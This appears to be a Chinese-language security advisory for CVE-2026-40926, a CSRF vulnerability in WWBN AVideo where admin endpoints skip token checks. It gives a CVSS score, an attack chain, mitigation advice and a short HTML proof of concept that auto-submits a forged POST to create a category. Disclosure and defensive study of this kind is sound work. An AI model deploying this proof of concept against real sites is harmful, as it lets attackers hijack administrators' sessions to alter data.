CVE-2026-40926 CVSS 7.1 高危

CVE-2026-40926 AVideo平台CSRF漏洞

披露日期: 2026-04-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-40926

漏洞类型

跨站请求伪造 (CSRF)

CVSS评分

7.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

WWBN AVideo

漏洞概述

WWBN AVideo 29.0及之前版本存在跨站请求伪造（CSRF）漏洞。由于特定管理员端点未进行CSRF Token验证，攻击者可诱导已登录的管理员访问恶意页面，在受害者会话中执行创建/删除分类或运行插件更新脚本等高危操作，可能导致系统被完全控制或数据完整性受损。

技术细节

该漏洞源于`objects/categoryAddNew.json.php`等三个管理员端点仅进行了角色权限检查（`isAdmin`），却未调用`isGlobalTokenValid()`或`forbidIfIsUntrustedRequest()`进行CSRF防御。攻击者可利用此疏忽，构造恶意链接诱导管理员点击或访问。一旦受害者浏览器发送请求，服务器将执行数据库更改操作或运行插件更新脚本。由于涉及插件更新，该漏洞可能被进一步利用以实现远程代码执行（RCE），对系统安全构成严重威胁。

攻击链分析

STEP 1

步骤1

攻击者构造包含恶意HTTP请求的HTML页面，针对AVideo未受CSRF保护的管理员端点。

STEP 2

步骤2

攻击者通过社会工程学手段（如钓鱼邮件）诱导已登录的管理员访问该恶意页面。

STEP 3

步骤3

管理员浏览器在后台自动携带Session Cookie向AVideo服务器发送伪造请求。

STEP 4

步骤4

服务器因缺少Token校验，误以为请求合法，执行创建分类或运行插件脚本等操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Proof of Concept for CVE-2026-40926 -->
<!-- This HTML page demonstrates how an attacker could trigger the category creation via CSRF -->
<html>
  <body>
    <script>
      function exploit() {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://target-site/objects/categoryAddNew.json.php", true);
        xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
        // Payload to create a new category
        xhr.send("name=HackedCategory&parents_id=0");
      }
      // Auto-trigger on load
      exploit();
    </script>
  </body>
</html>

影响范围

WWBN AVideo <= 29.0

防御指南

临时缓解措施

建议管理员在非必要情况下退出登录，避免点击不明链接或访问不可信的网站。若无法立即升级，可在Web服务器层面配置严格的Referrer检查规则，作为临时的缓解方案。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表